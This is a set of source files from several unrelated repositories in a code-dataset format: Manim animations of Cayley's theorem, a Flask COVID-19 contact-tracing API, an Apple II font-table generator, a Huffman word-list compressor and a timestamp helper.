MoveToTarget(group_def)
)
self.play(
group_def[1].animate.set_color(BLUE),
group_def[3].animate.set_color(RED)
)
g = MathTex(r'g').scale(2).set_color(BLUE)
self.play(
ReplacementTransform(group_def[1].copy(), g)
)
self.wait(2)
Tg = MathTex(r'T', r'_g').scale(2)
Tg[1].set_color(BLUE)
self.play(
ReplacementTransform(g, Tg[1])
)
self.play(
Write(Tg[0])
)
self.wait(2)
Tg_map = MathTex(r'T', r'_g', r': G \rightarrow G').scale(2)
Tg_map[1].set_color(BLUE)
self.play(
Transform(Tg, Tg_map[:2])
)
self.remove(Tg_map[:2])
self.play(
Write(Tg_map[2:])
)
self.wait(2)
self.play(
Unwrite(Tg_map[2:])
)
Tg_func = MathTex(r'T', r'_g', r'(', r'x', r') =', r'g', r'*', r'x').scale(2)
Tg_func[1].set_color(BLUE)
Tg_func[5].set_color(BLUE)
Tg_func[6].set_color(RED)
self.play(
Transform(Tg, Tg_func[:2])
)
self.play(
Write(Tg_func[2:5])
)
self.play(
Write(Tg_func[5], run_time=0.5)
)
self.play(
ReplacementTransform(group_def[3].copy(), Tg_func[6], run_time=0.5)
)
self.play(
ReplacementTransform(Tg_func[3].copy(), Tg_func[7], run_time=0.5)
)
self.wait(2)
self.remove(Tg)
Tg_func.generate_target()
Tg_func.target.move_to(UP * 3 + RIGHT * 4)
Tg_func.target.scale(0.5)
self.play(
MoveToTarget(Tg_func)
)
divider = Line(array([-10, 0, 0]), array([10, 0, 0]), color=YELLOW)
divider.move_to(UP*2.5)
self.play(
Create(divider)
)
self.wait(2)
Tg_comp = MathTex(r'(', r'T', r'_g', r'\circ', r'T', r'_{g^{-1}}', r')').scale(2)
Tg_comp[2].set_color(BLUE)
Tg_comp[5].set_color(BLUE)
self.play(
Write(Tg_comp[1], run_time=0.5)
)
self.play(
ReplacementTransform(group_def[1].copy(), Tg_comp[2], run_time=0.5)
)
self.play(
Write(Tg_comp[3:5], run_time=0.5)
)
self.play(
ReplacementTransform(group_def[1].copy(), Tg_comp[5], run_time=0.5)
)
self.play(
Write(Tg_comp[0]),
Write(Tg_comp[6])
)
Tg_comp2 = MathTex(r'(', r'T', r'_g', r'\circ', r'T', r'_{g^{-1}}', r')', r'(', r'x', r')').scale(2)
Tg_comp2[2].set_color(BLUE)
Tg_comp2[5].set_color(BLUE)
self.play(
Transform(Tg_comp, Tg_comp2[:7])
)
self.play(
Write(Tg_comp2[7:])
)
self.remove(Tg_comp)
Tg_comp3 = MathTex(r'T', r'_g', r'(', r'T', r'_{g^{-1}}', r'(', r'x', r')', r')').scale(2)
Tg_comp3[1].set_color(BLUE)
Tg_comp3[4].set_color(BLUE)
self.play(
ReplacementTransform(Tg_comp2, Tg_comp3)
)
self.wait(2)
Tg_comp_def = MathTex(r'T', r'_g', r'(', r'T', r'_{g^{-1}}', r'(', r'x', r')', r')', r'=', r'g', r'*', r'(', r'g^{-1}', r'*', r'x', r')').scale(2)
Tg_comp_def[1].set_color(BLUE)
Tg_comp_def[4].set_color(BLUE)
Tg_comp_def[10].set_color(BLUE)
Tg_comp_def[13].set_color(BLUE)
Tg_comp_def[11].set_color(RED)
Tg_comp_def[14].set_color(RED)
self.play(
ReplacementTransform(Tg_comp3, Tg_comp_def[:9])
)
self.play(
Write(Tg_comp_def[9:])
)
self.remove(Tg_comp3)
Tg_comp_def2 = MathTex(r'T', r'_g', r'(', r'T', r'_{g^{-1}}', r'(', r'x', r')', r')', r'=', r'(', r'g', r'*', r'g^{-1}', r')', r'*', r'x').scale(2)
Tg_comp_def2[1].set_color(BLUE)
Tg_comp_def2[4].set_color(BLUE)
Tg_comp_def2[11].set_color(BLUE)
Tg_comp_def2[13].set_color(BLUE)
Tg_comp_def2[12].set_color(RED)
Tg_comp_def2[15].set_color(RED)
self.play(
ReplacementTransform(Tg_comp_def, Tg_comp_def2)
)
Tg_comp_def3 = MathTex(r'T', r'_g', r'(', r'T', r'_{g^{-1}}', r'(', r'x', r')', r')', r'=', r'x').scale(2)
Tg_comp_def3[1].set_color(BLUE)
Tg_comp_def3[4].set_color(BLUE)
self.wait(2)
self.play(
FadeOut(Tg_comp_def2[10:16], run_time=0.5),
ReplacementTransform(Tg_comp_def2[:10], Tg_comp_def3[:10]),
ReplacementTransform(Tg_comp_def2[-1], Tg_comp_def3[-1])
)
self.remove(Tg_comp_def2)
Tg_inv = MathTex(r'(', r'T', r'_g', r')', r'^{-1}', r'=', r'T', r'_{g^{-1}}').scale(2)
Tg_inv[2].set_color(BLUE)
Tg_inv[7].set_color(BLUE)
self.wait(2)
self.play(
ReplacementTransform(Tg_comp_def3, Tg_inv)
)
self.wait(2)
self.play(
Unwrite(Tg_inv)
)
self.wait(2)
class Cayley2(Scene):
def construct(self):
group_def = MathTex(r'G = \left(', r'\{g_1, g_2, ...\}', r',', r'*', r'\right)')
group_def[1].set_color(BLUE)
group_def[3].set_color(RED)
group_def.move_to(UP*3 + LEFT*4)
Tg_func = MathTex(r'T', r'_g', r'(', r'x', r') =', r'g', r'*', r'x')
Tg_func[1].set_color(BLUE)
Tg_func[5].set_color(BLUE)
Tg_func[6].set_color(RED)
Tg_func.move_to(UP*3 + RIGHT*4)
divider = Line(array([-10, 0, 0]), array([10, 0, 0]), color=YELLOW)
divider.move_to(UP * 2.5)
self.add(group_def, Tg_func, divider)
prop1 = MathTex(r'T', r'_g', r'\text{ is\ldots}')
prop1[1].set_color(BLUE)
prop2 = Tex(r'bijective (well-defined inverse)')
prop3 = Tex(r'a self-mapping of the set of elements in $G$')
prop4 = Tex(r'\vdots')
prop5 = Tex(r'permutation!')
prop1.shift(UP*1)
print(prop1)
vg = VGroup(prop1, prop2, prop3, prop4, prop5)
for i in range(4):
vg[i+1].next_to(vg[i], DOWN)
self.play(
Write(vg[0])
)
self.play(
Write(vg[1])
)
self.play(
Write(vg[2])
)
self.play(
Write(vg[3])
)
self.play(
Write(vg[4])
)
self.wait(2)
self.play(
Unwrite(vg)
)
self.wait(2)
class Cayley3(Scene):
def construct(self):
group_def = MathTex(r'G = \left(', r'\{g_1, g_2, ...\}', r',', r'*', r'\right)')
group_def[1].set_color(BLUE)
group_def[3].set_color(RED)
group_def.move_to(UP * 3 + LEFT * 4)
Tg_func = MathTex(r'T', r'_g', r'(', r'x', r') =', r'g', r'*', r'x')
Tg_func[1].set_color(BLUE)
Tg_func[5].set_color(BLUE)
Tg_func[6].set_color(RED)
Tg_func.move_to(UP * 3 + RIGHT * 4)
divider = Line(array([-10, 0, 0]), array([10, 0, 0]), color=YELLOW)
divider.move_to(UP * 2.5)
self.add(group_def, Tg_func, divider)
H = MathTex(r'H', r'=', r'\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\}').scale(2)
H[4].set_color(BLUE)
H[6].set_color(BLUE)
self.play(
Write(H)
)
self.wait(2)
group_def.generate_target()
group_def.target.shift(0.25*LEFT)
H.generate_target()
H.target.scale(0.5)
H.target.next_to(group_def.target, 4*RIGHT)
Tg_func.generate_target()
Tg_func.target.next_to(H.target, 4*RIGHT)
self.play(
MoveToTarget(H),
MoveToTarget(group_def),
MoveToTarget(Tg_func)
)
props = BulletedList('associativity', 'existence of identity element', r'existence of inverse elements\phantom{y}', r'closure\phantom{y}')
label = Tex('Under composition, $H$ satisfies\ldots')
props.shift(DOWN)
label.next_to(props, 2*UP)
props.shift(2*LEFT)
self.play(
Write(label)
)
self.play(
Write(props)
)
self.wait(2)
check = MathTex(r'\checkmark').set_color(GREEN)
checks = VGroup()
for i in range(4):
checks.add(check.copy())
checks[i].next_to(props[i], RIGHT)
identity = MathTex(r'e_H=T', r'_e')
identity[1].set_color(BLUE)
identity.next_to(checks[-3], RIGHT)
inverse = MathTex(r'(T', r'_g', r')^{-1}=T', r'_{g^{-1}}')
inverse[1].set_color(BLUE)
inverse[3].set_color(BLUE)
inverse.next_to(checks[-2], RIGHT)
closure = MathTex(r'T', r'_a', r'\circ', r'T', r'_b', r'=', r'T', r'_{a', r'*', r'b}')
closure[1].set_color(BLUE)
closure[4].set_color(BLUE)
closure[7].set_color(BLUE)
closure[8].set_color(RED)
closure[9].set_color(BLUE)
closure.next_to(checks[-1], RIGHT)
extra = [None, identity, inverse, closure]
for i in range(4):
self.play(
Write(checks[i])
)
if extra[i] is not None:
self.play(
Write(extra[i])
)
self.wait(1)
self.wait(2)
H_group = MathTex(r'H', r'=', r'(\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\},\circ)')
H_group.move_to(H)
H_group[4].set_color(BLUE)
H_group[6].set_color(BLUE)
self.play(
ReplacementTransform(H, H_group)
)
self.wait(2)
self.play(
*[Unwrite(check) for check in checks],
*[Unwrite(ex) for ex in extra if ex is not None],
Unwrite(label),
Unwrite(props)
)
self.wait(2)
class Cayley4(Scene):
def construct(self):
group_def = MathTex(r'G = \left(', r'\{g_1, g_2, ...\}', r',', r'*', r'\right)')
group_def[1].set_color(BLUE)
group_def[3].set_color(RED)
group_def.move_to(UP * 3 + LEFT * 4.25)
H = MathTex(r'H', r'=', r'\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\}')
H[4].set_color(BLUE)
H[6].set_color(BLUE)
H.next_to(group_def, 4*RIGHT)
Tg_func = MathTex(r'T', r'_g', r'(', r'x', r') =', r'g', r'*', r'x')
Tg_func[1].set_color(BLUE)
Tg_func[5].set_color(BLUE)
Tg_func[6].set_color(RED)
Tg_func.next_to(H, 4*RIGHT)
H_group = MathTex(r'H', r'=', r'(\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\},\circ)')
H_group[4].set_color(BLUE)
H_group[6].set_color(BLUE)
H_group.move_to(H)
divider = Line(array([-10, 0, 0]), array([10, 0, 0]), color=YELLOW)
divider.move_to(UP * 2.5)
self.add(group_def, H_group, Tg_func, divider)
phi_map = MathTex(r'\varphi', r': G \rightarrow H').scale(2)
phi_map[0].set_color(GOLD)
self.play(
Write(phi_map)
)
self.wait(2)
self.play(
Unwrite(phi_map[1:])
)
phi_func = MathTex(r'\varphi', r'(', r'g', r')', r'=', r'T', r'_g').scale(2)
phi_func[0].set_color(GOLD)
phi_func[2].set_color(BLUE)
phi_func[-1].set_color(BLUE)
self.play(
Transform(phi_map[0], phi_func[0])
)
self.play(
Write(phi_func[1:])
)
self.wait(2)
self.remove(phi_map[0])
phi_func.generate_target()
phi_func.target.scale(0.5)
phi_func.target.shift(UP*2)
phi_func.target.align_to(group_def, LEFT)
self.play(
MoveToTarget(phi_func)
)
self.wait(2)
homo = MathTex(r'\varphi', '(', 'a', ')\circ', r'\varphi', '(', 'b', ')').scale(2)
homo[0].set_color(GOLD)
homo[2].set_color(BLUE)
homo[4].set_color(GOLD)
homo[6].set_color(BLUE)
homo_full = MathTex(r'\varphi', '(', 'a', r')\circ', r'\varphi', '(', 'b', ')', '=', 'T', '_a', r'\circ', 'T', '_b').scale(2)
homo_full[0].set_color(GOLD)
homo_full[2].set_color(BLUE)
homo_full[4].set_color(GOLD)
homo_full[6].set_color(BLUE)
homo_full[10].set_color(BLUE)
homo_full[13].set_color(BLUE)
homo_simp = MathTex(r'\varphi', '(', 'a', ')\circ', r'\varphi', '(', 'b', ')', '=', 'T', '_{a', '*', 'b}').scale(2)
homo_simp[0].set_color(GOLD)
homo_simp[2].set_color(BLUE)
homo_simp[4].set_color(GOLD)
homo_simp[6].set_color(BLUE)
homo_simp[10].set_color(BLUE)
homo_simp[11].set_color(RED)
homo_simp[12].set_color(BLUE)
homo_homo = MathTex(r'\varphi', '(', 'a', ')\circ', r'\varphi', '(', 'b', ')', '=', r'\varphi', '(', 'a', '*', 'b', ')').scale(2)
homo_homo[0].set_color(GOLD)
homo_homo[2].set_color(BLUE)
homo_homo[4].set_color(GOLD)
homo_homo[6].set_color(BLUE)
homo_homo[9].set_color(GOLD)
homo_homo[11].set_color(BLUE)
homo_homo[12].set_color(RED)
homo_homo[13].set_color(BLUE)
self.play(
Write(homo)
)
self.wait(2)
self.play(
ReplacementTransform(homo, homo_full[:8])
)
self.remove(homo)
self.play(
Write(homo_full[8:])
)
self.wait(2)
self.play(
Unwrite(homo_full[9:])
)
self.play(
ReplacementTransform(homo_full[:9], homo_simp[:9])
)
self.remove(homo_full)
self.play(
Write(homo_simp[9:])
)
self.wait(2)
self.play(
Unwrite(homo_simp[9:])
)
self.play(
ReplacementTransform(homo_simp[:9], homo_homo[:9])
)
self.remove(homo_simp)
self.play(
Write(homo_homo[9:])
)
self.wait(2)
self.play(
Unwrite(homo_homo[1:])
)
conc = Tex(r'$\varphi$', ' is a homomorphism!').scale(2)
conc[0].set_color(GOLD)
self.play(
ReplacementTransform(homo_homo[0], conc[0])
)
self.play(
Write(conc[1:])
)
self.wait(2)
self.remove(homo_homo[0])
self.play(
Unwrite(conc)
)
self.wait(2)
class Cayley5(Scene):
def construct(self):
group_def = MathTex(r'G = \left(', r'\{g_1, g_2, ...\}', r',', r'*', r'\right)')
group_def[1].set_color(BLUE)
group_def[3].set_color(RED)
group_def.move_to(UP * 3 + LEFT * 4.25)
H = MathTex(r'H', r'=', r'\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\}')
H[4].set_color(BLUE)
H[6].set_color(BLUE)
H.next_to(group_def, 4 * RIGHT)
Tg_func = MathTex(r'T', r'_g', r'(', r'x', r') =', r'g', r'*', r'x')
Tg_func[1].set_color(BLUE)
Tg_func[5].set_color(BLUE)
Tg_func[6].set_color(RED)
Tg_func.next_to(H, 4 * RIGHT)
H_group = MathTex(r'H', r'=', r'(\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\},\circ)')
H_group[4].set_color(BLUE)
H_group[6].set_color(BLUE)
H_group.move_to(H)
phi_func = MathTex(r'\varphi', r'(', r'g', r')', r'=', r'T', r'_g')
phi_func[0].set_color(GOLD)
phi_func[2].set_color(BLUE)
phi_func[-1].set_color(BLUE)
phi_func.shift(UP * 2)
phi_func.align_to(group_def, LEFT)
divider = Line(array([-10, 0, 0]), array([10, 0, 0]), color=YELLOW)
divider.move_to(UP * 2.5)
self.add(group_def, H_group, Tg_func, phi_func, divider)
inj1 = MathTex(r'\varphi', r'(', r'a', r')', r'=', r'\varphi', '(', 'b', ')').scale(2)
inj1[0].set_color(GOLD)
inj1[2].set_color(BLUE)
inj1[5].set_color(GOLD)
inj1[7].set_color(BLUE)
inj2 = MathTex(r'T', r'_a', r'=', r'T', '_b').scale(2)
inj2[1].set_color(BLUE)
inj2[4].set_color(BLUE)
inj3 = MathTex(r'T', r'_a', r'(x)', r'=', r'T', '_b', r'(x)').scale(2)
inj3[1].set_color(BLUE)
inj3[5].set_color(BLUE)
inj4 = MathTex(r'a', r'*', r'x', r'=', r'b', '*', r'x').scale(2)
inj4[0].set_color(BLUE)
inj4[1].set_color(RED)
inj4[4].set_color(BLUE)
inj4[5].set_color(RED)
inj5 = MathTex(r'a', r'=', r'b').scale(2)
inj5[0].set_color(BLUE)
inj5[2].set_color(BLUE)
inj = Tex(r'$\varphi$', r' is injective\ldots')
inj[0].set_color(GOLD)
surj = Tex(r'$\varphi$', r' is surjective because it is defined as a function.')
surj[0].set_color(GOLD)
self.play(
Write(surj)
)
self.wait(2)
self.play(
Unwrite(surj)
)
self.wait(2)
self.play(
Write(inj)
)
self.wait(2)
self.play(
Unwrite(inj)
)
self.wait(2)
self.play(
Write(inj1)
)
self.wait(2)
self.play(
ReplacementTransform(inj1, inj2)
)
self.wait(2)
self.play(
ReplacementTransform(inj2, inj3)
)
self.wait(2)
self.play(
ReplacementTransform(inj3, inj4)
)
self.wait(2)
self.play(
ReplacementTransform(inj4, inj5)
)
self.wait(2)
self.play(
Unwrite(inj5)
)
self.wait(2)
conc = MathTex(r'G \approx H').scale(2)
self.play(
Write(conc)
)
self.wait(2)
self.play(
Unwrite(conc)
)
self.wait(2)
class CayleyIntro(Scene):
def construct(self):
title = Tex('Cayley\'s Theorem').scale(3)
title.shift(UP)
line = Line(6*LEFT, 6*RIGHT)
line.next_to(title, DOWN)
desc = Tex(r'Every group is isomorphic to some permutation group.')
desc.next_to(line, DOWN*2)
self.play(
Write(title),
Create(line)
)
self.wait(2)
self.play(
Write(desc)
)
self.wait(2)
self.play(
Unwrite(title),
Unwrite(desc),
Uncreate(line)
)
self.wait(2)
```
#### File: src/manim/section_intro_cards.py
```python
from manim import *
import sys
def draw_intro(self: Scene, section_number: int, subtitle: str) -> None:
text = MarkupText(
f"Section {section_number}:\n<span size=\"xx-small\">{subtitle}</span>",
font_size=100
)
self.play(Write(text, run_time=5))
self.wait(0.3)
self.play(text.animate.shift(DOWN * 10))
self.wait()
class Intro1(Scene):
def construct(self):
draw_intro(self, 1, "What is a permutation group?")
class Intro2(Scene):
def construct(self):
draw_intro(self, 2, "Examples of permutation groups")
class Intro3(Scene):
def construct(self):
draw_intro(self, 3, "Properties and theorems")
class Intro4(Scene):
def construct(self):
draw_intro(self, 4, "Related math theory")
``` |
{
"source": "a2441918/covid19-api",
"score": 2
} |
#### File: api/controllers/controllers.py
```python
from src.database import db
from src.models.people_model import People
from src.models.test_result_model import TestResultModel
from src.models.met_person_model import MetPerson
from src.models.meeting_model import Meeting
def create_new_person(data):
Name = data.get('Name')
Contact = data.get('Contact')
people = People(Name, Contact)
db.session.add(people)
db.session.commit()
def update_test_result_status(data):
PersonId = data.get('PersonId')
TestTakenDate = data.get('TestTakenDate')
TestResultStatus = data.get('TestResultStatus')
test_result = TestResultModel(PersonId, TestResultStatus, TestTakenDate)
db.session.add(test_result)
db.session.commit()
def update_person_contact(data):
PersonId = data.get('PersonId')
MetPersonId = data.get('MetPersonId')
MetPersonDate = data.get('MetPersonDate')
meeting = Meeting(MetPersonDate)
db.session.add(meeting)
db.session.flush()
meeting = Meeting.query.order_by(Meeting.id.desc()).first()
if meeting.id is not None:
meetingPerson = MetPerson(PersonId, MetPersonId, MetPersonDate, meeting.id)
db.session.add(meetingPerson)
db.session.commit()
def update_meeting(data):
CreatedAt = data.get('MetPersonDate')
meeting = Meeting(CreatedAt)
db.session.add(meeting)
db.session.commit()
```
#### File: controllers/endpoints/statuses.py
```python
import logging
from flask import request
from flask_restx import Resource
from src.api import api
from src.api.controllers.serializers import quarantine_status, covid_status, test_result_status
log = logging.getLogger(__name__)
ns = api.namespace('status', description='Operations related to statuses')
@ns.route('/getQuarantineStatus')
@api.response(404, 'Endpoint not found.')
class GetAllQuarantineStatus(Resource):
@api.marshal_with(quarantine_status)
def get(self):
return [{
'id': 0,
'Status': 'Healthy',
'Color': 'Green'
}, {
'id': 1,
'Status': 'Risk',
'Color': 'Yellow'
}, {
'id': 2,
'Status': 'High Risk',
'Color': 'Red'
}]
@ns.route('/getCovidStatus')
@api.response(404, 'Endpoint not found.')
class GetAllCovidStatus(Resource):
@api.marshal_with(covid_status)
def get(self):
return [{
'id': 0,
'Status': 'Never Infected',
}, {
'id': 1,
'Status': 'Infected',
}, {
'id': 2,
'Status': 'Recovered',
}]
@ns.route('/getTestResultStatus')
@api.response(404, 'Endpoint not found.')
class GetAllTestResultStatus(Resource):
@api.marshal_with(test_result_status)
def get(self):
return [{
'id': 0,
'Status': 'Positive',
}, {
'id': 1,
'Status': 'Negative',
}]
```
#### File: controllers/endpoints/users.py
```python
import logging
from flask import request
from flask_restx import Resource, abort
from src.database import db
from src.request_validation import json_request
from src.api.controllers.controllers import create_new_person, update_test_result_status, update_person_contact
from src.api import api
from src.models.people_model import People
from src.api.controllers.serializers import people, test_result, person_meeting
from enum import IntEnum
log = logging.getLogger(__name__)
ns = api.namespace('users', description='Operations related to users')
class QuarantineStatusEnum(IntEnum):
HEALTHY = 0
RISK = 1
HIGH_RISK = 2
class CovidStatusEnum(IntEnum):
NEVER_INFECTED = 0
INFECTED = 1
RECOVERED = 2
class TestResultStatusEnum(IntEnum):
POSITIVE = 0
NEGATIVE = 1
@ns.route('/createNewUsers')
@api.response(404, 'Endpoint not found.')
class CreateNewPerson(Resource):
@api.expect(people, validate=True)
@api.response(204, 'Post successfully updated.')
@json_request
def post(self):
"""
Creates a new user.
"""
data = request.json
create_new_person(data)
return data, 200
@ns.route('/getUsers')
@api.response(404, 'Endpoint not found.')
class GetAllPeople(Resource):
@api.marshal_with(people)
def get(self):
peopleData = People.query.all()
return peopleData
@ns.route('/updateUserTestResultStatus')
@api.response(404, 'Endpoint not found.')
class UpdateUserTestResultStatus(Resource):
@api.expect(test_result, validate=True)
@api.response(204, 'Post successfully updated.')
@json_request
def post(self):
"""
Updates the test result status of a user.
"""
data = request.json
PersonId = data.get('PersonId')
TestResultStatus = data.get('TestResultStatus')
person = People.query.filter_by(id=PersonId).first()
if person.CurrentCovidStatus == CovidStatusEnum.NEVER_INFECTED and TestResultStatus == TestResultStatusEnum.NEGATIVE:
abort(409, 'Person is not infected at all')
if person.CurrentCovidStatus == CovidStatusEnum.INFECTED and TestResultStatus == TestResultStatusEnum.POSITIVE:
abort(409, 'Person is already infected')
if person.CurrentCovidStatus == CovidStatusEnum.RECOVERED:
abort(409, "Person is recovered")
if person.CurrentCovidStatus == CovidStatusEnum.INFECTED and TestResultStatus == TestResultStatusEnum.NEGATIVE:
person.QuarantineStatus = QuarantineStatusEnum.RISK
person.CurrentCovidStatus = CovidStatusEnum.RECOVERED
person.UpdatedAt = db.func.now()
if person.CurrentCovidStatus == CovidStatusEnum.NEVER_INFECTED and TestResultStatus == TestResultStatusEnum.POSITIVE:
person.QuarantineStatus = QuarantineStatusEnum.HIGH_RISK
person.CurrentCovidStatus = CovidStatusEnum.INFECTED
person.UpdatedAt = db.func.now()
db.session.commit()
update_test_result_status(data)
return data, 200
@ns.route('/updatePersonMeeting')
@api.response(404, 'Endpoint not found.')
class UpdatePersonMeetingStatus(Resource):
@api.expect(person_meeting, validate=True)
@api.response(204, 'Post successfully updated.')
@json_request
def post(self):
"""
Updates the meeting status of a user.
"""
data = request.json
update_person_contact(data)
return data, 200
```
#### File: src/models/met_person_model.py
```python
from datetime import datetime
from src.database import db
class MetPerson(db.Model):
__tablename__ = 'PersonMeeting'
PersonId = db.Column(db.Integer, db.ForeignKey('People.id'), primary_key=True, nullable=False)
MeetingId = db.Column(db.Integer, db.ForeignKey('Meeting.id'), primary_key=True, nullable=False)
MetPersonId = db.Column(db.Integer, nullable=False)
CreatedAt = db.Column(db.DateTime, default=db.func.now())
db.UniqueConstraint('PersonId', 'MetPersonId')
def __init__(self, PersonId, MetPersonId, CreatedAt, MeetingId):
self.PersonId = PersonId
self.MetPersonId = MetPersonId
self.CreatedAt = CreatedAt
self.MeetingId = MeetingId
def __repr__(self):
return '<MetPersonId %r>' % self.MetPersonId
```
#### File: covid19-api/src/request_validation.py
```python
from flask import abort, request
from functools import wraps
def json_request(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not request.is_json:
abort(415)
return fn(*args, **kwargs)
return wrapper
``` |
{
"source": "a2-4am/million-perfect-letters",
"score": 3
} |
#### File: res/Courier Double Prime/font.py
```python
def myhex(bitstring):
return hex(int(bitstring, 2))[2:].rjust(2, "0").upper()
leftdata = [ [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [] ]
rightdata = [ [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [] ]
with open("font.txt", "r") as f:
for c in 'ABCDEFGHJIKLMNOPQRSTUVWXYZ':
#print(c)
for row in range(16):
left = f.read(7)
right = f.read(7)
f.readline()
left = "0b1" + left[::-1]
right = "0b1" + right[::-1]
#print(myhex(left), myhex(right))
leftdata[row].append(myhex(left))
rightdata[row].append(myhex(right))
print("; Courier Double Prime pixel font")
print("; (c) 2019-2020 by 4am")
print("; license:Open Font License 1.1, see OFL.txt")
print("; This file is automatically generated")
for row in range(16):
print("LeftFontRow%s" % row)
for c, i in zip(leftdata[row], range(len(leftdata[row]))):
print(" !byte $%s ; %s" % (c, chr(i+65)))
for row in range(16):
print("RightFontRow%s" % row)
for c, i in zip(rightdata[row], range(len(rightdata[row]))):
print(" !byte $%s ; %s" % (c, chr(i+65)))
``` |
{
"source": "a2-4am/untitled-word-game",
"score": 3
} |
#### File: untitled-word-game/bin/packer.py
```python
from bitstring import BitArray
import collections
import itertools
import math
import sys
import time
class Tree:
def __init__(self, left=None, right=None):
self.left = left
self.right = right
def construct_frequency_tree(freqs):
nodes = freqs
while len(nodes) > 1:
key1, val1 = nodes[-1]
key2, val2 = nodes[-2]
node = Tree(key1, key2)
nodes = nodes[:-2]
nodes.append((node, val1 + val2))
nodes = sorted(nodes, key=lambda x: x[1], reverse=True)
return nodes
def generate_huffman_code(node, binary, is_left_node=True):
if isinstance(node, str) or isinstance(node, int):
return {node: binary}
d = {}
d.update(generate_huffman_code(node.left, binary + [0], True))
d.update(generate_huffman_code(node.right, binary + [1], False))
return d
def count_frequencies(string):
freq = collections.defaultdict(int)
for char in string:
freq[char] += 1
return sorted(freq.items(), key=lambda x: x[1], reverse=True)
def max_len_table(tables):
return max([len(huff) for huff in tables])
def bits_needed_to_represent(num):
mask = 0b1 << 32
for i in range(32):
if (((num & mask) >> 31 - i)):
return 32 - i + 1;
mask >>= 1
return 0
def leaves_at_depth(trie, target_level, level=0):
if level == target_level:
return trie.keys()
keys = []
for v in trie.values():
keys += leaves_at_depth(v, target_level, level+1)
return keys
def count_children_trie(trie, children):
children.append(len(trie.keys()))
for k, v in trie.items():
count_children_trie(v, children)
def max_children_trie(trie):
max_len = 0
for k, v in trie.items():
v_len = len(v.keys())
max_len = max(max_len, v_len)
max_len = max(max_len, max_children_trie(v))
return max_len
def convert_trie_to_bits(trie, bit_trie, tables, depth=0, smart=False):
for k, v in trie.items():
if not smart or v.keys():
bit_trie.append(tables[-1][len(v.keys())])
bit_trie.append(tables[depth][k])
convert_trie_to_bits(v, bit_trie, tables, depth+1, smart=smart)
class BitStream:
def __init__(self, bit_array, char_map=None):
self.bits = bit_array
self.bin = self.bits.bin
self.i = 0
self.char_map = char_map
def write(self, key, num_bits):
bits = []
val = self.char_map[key] if isinstance(key, str) else key
mask = 0b1 << num_bits - 1
for i in range(1, num_bits + 1):
bits.append((val & mask) >> num_bits - i)
mask >>= 1
self.bits.append(bits)
def append(self, data):
self.bits.append(data)
def read(self, num_bits):
bits = self.bin[self.i:self.i+num_bits]
self.i += num_bits
return bits
def read_int(self, num_bits):
return int(self.read(num_bits), 2)
def read_varint(self, table):
buf = ''
i = 0
while True:
buf += str(self.read(1))
if buf in table.keys():
return table[buf]
i += 1
def __len__(self):
return len(self.bits)
if __name__ == "__main__":
infile = sys.argv[1]
outfile = sys.argv[2]
with open(infile, 'r') as fp:
words = [w.strip() for w in fp.readlines()]
def gram_1(x):
return x
func = gram_1
INT_MAP = dict(zip(
list('ABCDEFGHIJKLMNOPQRSTUVWXYZ'),
range(26)
))
trie = {}
for word in words:
node = trie
for letter in func(word):
if letter not in node:
node[letter] = {}
node = node[letter]
tables = []
for i in range(len(func(words[0]))):
string = leaves_at_depth(trie, i)
freqs = count_frequencies(string)
tree = construct_frequency_tree(freqs)
huff = generate_huffman_code(tree[0][0], [])
total = sum([x[1] for x in freqs])
smaller = 0
bigger = 0
for k, v in sorted(freqs, key=lambda x: x[1], reverse=True):
if len(huff[k]) < 5:
smaller += v
if len(huff[k]) > 5:
bigger += v
print("{} | {} | {} | {:0.1f}%".format(k, "".join(map(str, huff[k])), v,
v/total*100))
print("Smaller: {:0.1f}%".format(smaller / total * 100))
print("Bigger: {:0.1f}%".format(bigger / total * 100))
print("")
tables.append(huff)
string = []
count_children_trie(trie, string)
freqs = count_frequencies(string)
tree = construct_frequency_tree(freqs[1:])
huff = generate_huffman_code(tree[0][0], [])
total = sum([x[1] for x in freqs[1:]])
smaller = 0
bigger = 0
print(huff, freqs)
for k, v in sorted(freqs[1:], key=lambda x: x[1], reverse=True):
if len(huff[k]) < 5:
smaller += v
if len(huff[k]) > 5:
bigger += v
print("{} | {} | {} | {:0.1f}%".format(k, "".join(map(str, huff[k])), v,
v/total*100))
print("Smaller: {:0.1f}%".format(smaller / total * 100))
print("Bigger: {:0.1f}%".format(bigger / total * 100))
print("")
tables.append(huff)
bits = BitStream(BitArray(), char_map=INT_MAP)
table_size = bits_needed_to_represent(max_len_table(tables))
word_size = bits_needed_to_represent(len(INT_MAP))
num_tables = len(tables)
num_symbols = len(tables[0])
# Header.
bits.write(table_size, 8)
bits.write(word_size, 8)
bits.write(num_tables, 8)
bits.write(num_symbols, 16)
# Encode the Huffman tables.
header_size = len(bits)
for table in tables:
bits.write(len(table), table_size)
for char, binary in table.items():
bits.write(char, word_size)
bits.write(len(binary), 8)
bits.append(binary)
huff_size = len(bits) - header_size
# Encode the payload.
max_children = max_children_trie(trie)
convert_trie_to_bits(trie, bits.bits, tables, smart=True)
payload_size = len(bits) - huff_size
print("#")
print("# Encoding")
print("#")
print("")
print("Table Size Bits:", table_size)
print("Huffman Table Word Bits:", word_size)
print("Num Tables:", num_tables)
print("Num Symbols", num_symbols)
for i, table in enumerate(tables):
print("Table {}:".format(i), len(table))
print("")
print("Header (Bytes):", math.ceil(header_size / 8))
print("Tables (Bytes):", math.ceil(huff_size / 8))
print("Payload (Bytes):", math.ceil(payload_size / 8))
print("Filesize (Bytes):", math.ceil(len(bits) / 8))
print("")
with open(outfile, "wb") as fp:
fp.write(bits.bits.tobytes())
print("Wrote", outfile)
``` |
{
"source": "a24ibrah/Project0001",
"score": 2
} |
#### File: a24ibrah/Project0001/gethandler.py
```python
import tornado.web
class GetHandler(tornado.web.RequestHandler):
def initialize(self, books):
self.books = books
def get(self):
self.write(self.books.json_list())
``` |
{
"source": "a24ma/aoutil",
"score": 3
} |
#### File: aoutil/aoutil/now.py
```python
from logging import getLogger
from datetime import datetime
log = getLogger(__name__)
prev_ts = None
def now():
now = datetime.now()
